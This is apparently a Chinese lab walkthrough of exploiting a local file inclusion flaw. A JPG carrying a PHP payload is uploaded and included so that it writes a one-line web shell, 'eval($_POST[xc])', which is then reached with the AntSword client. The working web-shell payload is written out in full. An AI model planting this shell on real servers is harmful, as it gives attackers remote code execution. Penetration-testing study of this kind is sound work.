第一步:制作图片木马(所需工具edjpqcom.exe)
文件包含漏洞(本地包含)将一个jpg文件拖入edjpgcom.exe
文件包含漏洞(本地包含)输入在含有文件包含漏洞文件夹中创建一句话木马的命令:

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[xc]);?>')?>

xc为连接木马密码
文件包含漏洞(本地包含)成功创建图片木马
文件包含漏洞(本地包含)
使用靶机上传该jpg木马
文件包含漏洞(本地包含)使用文件包含漏洞包含该jpg,使得其中代码得以执行

文件包含漏洞(本地包含)因为是靶机,我们可以登录看到成功创建shell20.php这个一句话木马
文件包含漏洞(本地包含)使用中国蚁剑连接到一句话木马
文件包含漏洞(本地包含)

成功渗透。

相关文章:

  • 2021-11-09
  • 2021-10-31
  • 2021-07-05
猜你喜欢
  • 2021-11-18
  • 2021-05-18
  • 2021-12-15
  • 2021-09-29
  • 2021-04-18
  • 2022-03-13
  • 2021-09-26
相关资源
相似解决方案